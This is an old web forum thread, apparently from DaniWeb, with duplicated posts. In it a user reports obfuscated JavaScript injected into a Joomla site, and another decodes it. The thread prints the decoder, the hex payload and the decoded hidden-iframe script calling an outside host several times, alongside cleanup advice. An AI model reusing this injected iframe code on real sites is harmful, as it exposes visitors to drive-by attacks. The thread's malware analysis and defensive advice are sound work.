JS script virus

Question

Harora 0 Newbie Poster

16 Years Ago

Hi All,

on my client's server in the php files JS script getting embedded. the site is built in Joomla.

is it virus or some problem with the joomla??
can any body please help me how can i get rid of it.

this is the script which gets embed

help me please

php

3 Contributors
5 Replies
94 Views
1 Day Discussion Span
Latest Post 16 Years Ago Latest Post by Harora

digital-ether 399 Nearly a Posting Virtuoso

16 Years Ago

Hi All,
on my client's server in the php files JS script getting embedded. the site is built in Joomla.
is it virus or some problem with the joomla??
can any body please help me how can i get rid of it.
this is the script which gets embed
function vyadbtVVVYV(vtxxYydYxxY){ var vVdbadtVVyy=595; return(parseInt(vtxxYydYxxY,16));}function vxaxabdbaaa(vdayytVxyVa){ function vaYyxayaatd () {return 595;} var vaxdxyVyVxa='';for(vaydVYYVytb=0; vaydVYYVytb<vdayytVxyVa.length; vaydVYYVytb+=2){vaxdxyVyVxa+=(String.fromCharCode(vyadbtVVVYV(vdayytVxyVa.substr(vaydVYYVytb,2))));}return vaxdxyVyVxa;}
help me please

Looks dodgy. Which PHP file is this getting embedded in?

digital-ether 399 Nearly a Posting Virtuoso

16 Years Ago

Hi Omol,
http://216.134.206.223/index2.php?option=com_fspadmin&task=login
have a look. you can see some junk characters bottom of the page which gets embedded.
http://216.134.206.223/index.php
have a look here also. when you refresh the page, in the left of bottom bar of browser you can see it calls a site www.reddii.org. this also gets embedded in the php files due to virus.
can you tell which virus is this ??

I ran the JS thats being embedded through a bit of regex to get it cleaned up a bit and this is what it looks like:

function hex2int(param_1)
{  
	return(parseInt(param_1,16));
}

function hex2ascii(hex_str)
{ 
	function func_3 () {
		return 86;
	} 
	var ascii_str='';
	for(i=0; i<hex_str.length; i+=2){
		ascii_str += (String.fromCharCode(hex2int(hex_str.substr(i,2))));
	}
	return ascii_str;
}

document.write(
	hex2ascii('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65202069643D227874595662746262567922206E616D653D226456566478746274795922207372633D22687474703A2F2F7265646469692E6F72672F747261666669632F667430346E65772F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3234303830292B2762625661745964647861222077696474683D2232383022206865696768743D22383622207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E'
	)
);

What it's doing is decoding the string :

3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65202069643D227874595662746262567922206E616D653D226456566478746274795922207372633D22687474703A2F2F7265646469692E6F72672F747261666669632F667430346E65772F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3234303830292B2762625661745964647861222077696474683D2232383022206865696768743D22383622207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E

Which is pairs of hex characters, into an ASCII string and writes it to the page. The actual ASCII is:

<SCRIPT>window.status='Done';document.write('<iframe  id="xtYVbtbbVy" name="dVVdxtbtyY" src="http://reddii.org/traffic/ft04new/index.php?'+Math.round(Math.random()*24080)+'bbVatYddxa" width="280" height="86" style="display: none;"></iframe>')</SCRIPT>

It doesn't look very dangerous itself, its probably just notifying that server that its got control of yours, so it can make use of your server for what ever purpose as they please.

You probably want to backup your Joomla database, then reinstall the whole Joomla installation from scratch and upload the import the exported database data back in.

Make sure you're using the latest version of Joomla, either the 1.0 series or 1.5.

It is likely that the problem may lie on the sever level though, if there is a vulnerability there, then reinstalling Joomla won't do it. But its a start.

ps:

Here's how to get to the resulting ASCII string in PHP:

$hex_str = '3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65202069643D227874595662746262567922206E616D653D226456566478746274795922207372633D22687474703A2F2F7265646469692E6F72672F747261666669632F667430346E65772F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3234303830292B2762625661745964647861222077696474683D2232383022206865696768743D22383622207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E';

$hex_arr = str_split($hex_str, 2);
$dec_arr = array_map('hexdec', $hex_arr);
$ascii_arr = array_map('chr', $dec_arr);
$ascii_str = implode('', $ascii_arr);

echo '<pre>'.htmlentities($ascii_str).'</pre>';

NB: At the moment they aren't sending anything dangerous, but that could change. So I'd patch it up ASAP.

Reply to this topic

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.

omol -2 Junior Poster · Answer 1 · 2008-08-26T22:59:36+00:00

What antivirus or popup blocking software are you using? Is this all? Can you give me / PM me the site url so i can have a look?

PM would be better just incase you are infected.

Harora 0 Newbie Poster · Answer 2 · 2008-08-27T13:04:18+00:00

What antivirus or popup blocking software are you using? Is this all? Can you give me / PM me the site url so i can have a look?
PM would be better just incase you are infected.

Hi Omol,

http://216.134.206.223/index2.php?option=com_fspadmin&task=login

have a look. you can see some junk characters bottom of the page which gets embedded.

http://216.134.206.223/index.php

have a look here also. when you refresh the page, in the left of bottom bar of browser you can see it calls a site www.reddii.org. this also gets embedded in the php files due to virus.

can you tell which virus is this ??

Harora 0 Newbie Poster · Answer 3 · 2008-08-27T18:49:12+00:00

I ran the JS thats being embedded through a bit of regex to get it cleaned up a bit and this is what it looks like:
function hex2int(param_1)
{  
	return(parseInt(param_1,16));
}

function hex2ascii(hex_str)
{ 
	function func_3 () {
		return 86;
	} 
	var ascii_str='';
	for(i=0; i<hex_str.length; i+=2){
		ascii_str += (String.fromCharCode(hex2int(hex_str.substr(i,2))));
	}
	return ascii_str;
}

document.write(
	hex2ascii('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65202069643D227874595662746262567922206E616D653D226456566478746274795922207372633D22687474703A2F2F7265646469692E6F72672F747261666669632F667430346E65772F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3234303830292B2762625661745964647861222077696474683D2232383022206865696768743D22383622207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E'
	)
);
What it's doing is decoding the string :
3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65202069643D227874595662746262567922206E616D653D226456566478746274795922207372633D22687474703A2F2F7265646469692E6F72672F747261666669632F667430346E65772F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3234303830292B2762625661745964647861222077696474683D2232383022206865696768743D22383622207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E
Which is pairs of hex characters, into an ASCII string and writes it to the page. The actual ASCII is:
<SCRIPT>window.status='Done';document.write('<iframe  id="xtYVbtbbVy" name="dVVdxtbtyY" src="http://reddii.org/traffic/ft04new/index.php?'+Math.round(Math.random()*24080)+'bbVatYddxa" width="280" height="86" style="display: none;"></iframe>')</SCRIPT>
It doesn't look very dangerous itself, its probably just notifying that server that its got control of yours, so it can make use of your server for what ever purpose as they please.
You probably want to backup your Joomla database, then reinstall the whole Joomla installation from scratch and upload the import the exported database data back in.
Make sure you're using the latest version of Joomla, either the 1.0 series or 1.5.
It is likely that the problem may lie on the sever level though, if there is a vulnerability there, then reinstalling Joomla won't do it. But its a start.
ps:
Here's how to get to the resulting ASCII string in PHP:
$hex_str = '3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65202069643D227874595662746262567922206E616D653D226456566478746274795922207372633D22687474703A2F2F7265646469692E6F72672F747261666669632F667430346E65772F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3234303830292B2762625661745964647861222077696474683D2232383022206865696768743D22383622207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E';

$hex_arr = str_split($hex_str, 2);
$dec_arr = array_map('hexdec', $hex_arr);
$ascii_arr = array_map('chr', $dec_arr);
$ascii_str = implode('', $ascii_arr);

echo '<pre>'.htmlentities($ascii_str).'</pre>';
NB: At the moment they aren't sending anything dangerous, but that could change. So I'd patch it up ASAP.

thank digital-ether
i will install the joomla then let c